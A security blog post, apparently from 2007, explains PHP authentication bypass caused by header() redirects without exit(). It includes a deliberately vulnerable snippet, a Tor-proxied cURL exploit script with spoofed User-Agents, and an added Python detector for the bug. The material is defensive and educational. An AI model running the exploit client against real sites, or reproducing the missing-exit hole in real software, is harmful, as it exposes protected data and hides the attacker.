The All Too Usual Exploits.

Published on: 1192604434 (Unix timestamp, 17 October 2007)
This isn't new stuff, still I like to stress to programmers how certain design decisions can hurt them in ways that were not foreseen. The exploits below are very common; personally, a rough estimate is that 70% to 80% of all software has at least one of them. Bug lists are a good indicator, since these exploits are all too common there. This isn't hard to secure yourself against, so just learn it and do it, because the examples below can deface, exploit or take down your website. And what is most important: if you secure against these, your server can no longer be used by attackers who install shells on it to attack other servers. Personally, it is exhausting to see popular software contain such holes, and moreover, a few months later, a second flaw is found which is the same one. You know, WordPress, phpBB and others.


Authentication bypass.

Usually programmers forget to exit a script after making a decision. One example is performing a redirect, in an authentication script or in something else that needs to be checked, like cookies. The problem with relying on the redirect is that header() only queues a response header; PHP keeps executing the rest of the script and sends its output as the body of the 302 response. A browser follows the redirect and never shows that body, which is why the bug goes unnoticed, but an attacker can write a client that does not follow your redirect and receives every line of output below the header() call.

<?php

# Vulnerable: header() only queues the redirect, it does not stop the script.
if($_COOKIE['user'] !== "apfnurajd") {
header("Location: index.php");
# exit(); <= this should always be set.
}

# Everything below still runs and is sent as the body of the 302 response.
# This should not be readable!
# content...
echo "Hello your config settings are:";
echo "user: foo";
echo "pass: bar";

?>

Exploitation code.

Here we use a fairly trivial cURL script that connects to the server and refuses to be redirected, by setting the cURL option CURLOPT_FOLLOWLOCATION to false. This way every line below the check in the script above is executed and its output is returned to us, simply because the script was not terminated with exit();. Note that nothing special is needed to trigger this: CURLOPT_FOLLOWLOCATION is already false by default in PHP's cURL binding, and a plain curl -i without -L on the command line shows the same leaked body after the 302 headers. The Tor proxy below only hides where the request comes from.

<?php

# Fetch $url through the local Tor proxy (Privoxy on 127.0.0.1:8118) with a
# randomised User-Agent and return the raw response, headers included,
# without following any redirect.
function torify($url){

$ua = array('Mozilla','Opera','Microsoft Internet Explorer','ia_archiver');
$op = array('Windows','Windows XP','Linux','Windows NT');
# array_rand() picks a valid index, so the list sizes can change freely.
$agent = $ua[array_rand($ua)].'/'.rand(1,8).'.'.rand(0,9).'('.$op[array_rand($op)].' '.rand(1,7).'.'.rand(0,9).'; en-US;)';

$timeout = 300;
$tor = '127.0.0.1:8118';
# $rcodes = parse_ini_file('C:PHPcURL.ini');

$packet = curl_init();
curl_setopt ($packet, CURLOPT_PROXY, $tor);
curl_setopt ($packet, CURLOPT_URL, $url);
curl_setopt ($packet, CURLOPT_USERAGENT, $agent);
curl_setopt ($packet, CURLOPT_HEADER, 1);         # include response headers in the result
curl_setopt ($packet, CURLOPT_RETURNTRANSFER, 1); # return the response instead of printing it
curl_setopt ($packet, CURLOPT_FOLLOWLOCATION, 0); # don't follow redirects!
curl_setopt ($packet, CURLOPT_TIMEOUT, $timeout);

$response = curl_exec($packet);
curl_close($packet);
return $response;
}

?>
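Two ways to check for this bug, as an added example in Python (not the post's own code): a line-based scan of PHP source for header('Location: ...') calls that are not followed by exit or die, and a check on a raw HTTP response (the kind of string the cURL script above returns with CURLOPT_HEADER set) that flags a redirect still carrying a body. The sample PHP source and responses are constructed from the snippet in the post. The scan is a heuristic that does not parse PHP: a call split across lines or inside a /* */ block comment is missed.

```python
"""Two checks for the missing-exit redirect bug described above.

Added example (not the post's own code). Both are heuristics: the source
scan is line-based and does not parse PHP, the response check only looks
at one response.
"""
import re

# header("Location: ..."), header('location:...'), any case, any spacing.
HEADER_RE = re.compile(r"""header\s*\(\s*['"]\s*location\s*:""", re.IGNORECASE)
# exit; / exit(); / die("..."); as the next statement.
TERMINATOR_RE = re.compile(r"^\s*(exit|die)\b", re.IGNORECASE)
# Single-line PHP comments only; /* ... */ blocks are not handled.
COMMENT_RE = re.compile(r"^\s*(#|//)")


def _next_code_line(lines, start):
    """First non-blank, non-comment line after index `start`, or None."""
    for text in lines[start + 1:]:
        if text.strip() and not COMMENT_RE.match(text):
            return text
    return None


def find_unterminated_redirects(php_source):
    """1-based line numbers of Location headers not followed by exit/die.

    A redirect header that is not the last statement executed is the bug:
    PHP keeps running and ships everything below it in the same response.
    """
    lines = php_source.splitlines()
    findings = []
    for idx, line in enumerate(lines):
        match = HEADER_RE.search(line)
        if match is None or COMMENT_RE.match(line):
            continue
        # exit on the same line: header("Location: /"); exit;
        after_call = line[match.end():]
        same_line_rest = after_call.split(";", 1)[1] if ";" in after_call else ""
        if TERMINATOR_RE.match(same_line_rest):
            continue
        nxt = _next_code_line(lines, idx)
        if nxt is None or not TERMINATOR_RE.match(nxt):
            findings.append(idx + 1)
    return findings


def redirect_leaks_body(raw_response):
    """True if a raw HTTP response is a 3xx redirect that still carries a body.

    This is what a client that does not follow redirects sees: a properly
    terminated script sends the 302 with an empty body, while a script that
    only set the header sends the page content after the blank line.
    """
    head, _, body = raw_response.partition(b"\r\n\r\n")
    status_line, *header_lines = head.split(b"\r\n")
    parts = status_line.split()
    if len(parts) < 2 or not parts[1].startswith(b"3"):
        return False
    has_location = any(h.lower().startswith(b"location:") for h in header_lines)
    return has_location and body.strip() != b""


# Constructed samples, modelled on the snippet in the post.
VULNERABLE_PHP = """<?php
if ($_COOKIE['user'] !== "apfnurajd") {
    header("location:index.php");
    # exit(); <= this should always be set.
}
echo "pass: bar";
"""

FIXED_PHP = """<?php
if (empty($_SESSION['uid'])) {
    header("Location: login.php");
    exit;
}
if ($_GET['go'] === 'home') { header('Location: /'); exit(); }
echo "pass: bar";
"""

# Constructed: what the vulnerable script returns to a non-following client.
LEAKY_RESPONSE = (
    b"HTTP/1.1 302 Found\r\n"
    b"Location: index.php\r\n"
    b"Content-Type: text/html\r\n"
    b"\r\n"
    b"Hello your config settings are:user: foopass: bar"
)
CLEAN_RESPONSE = b"HTTP/1.1 302 Found\r\nLocation: index.php\r\n\r\n"

if __name__ == "__main__":
    print("unterminated redirects (vulnerable):", find_unterminated_redirects(VULNERABLE_PHP))
    print("unterminated redirects (fixed):", find_unterminated_redirects(FIXED_PHP))
    print("leaky response leaks body:", redirect_leaks_body(LEAKY_RESPONSE))
    print("clean response leaks body:", redirect_leaks_body(CLEAN_RESPONSE))
```

Run the source scan over a whole code base before shipping; run the response check against the output of torify() (or curl -i without -L) on every page that is supposed to bounce unauthenticated users, and treat any 302 with a non-empty body as a finding to read by hand.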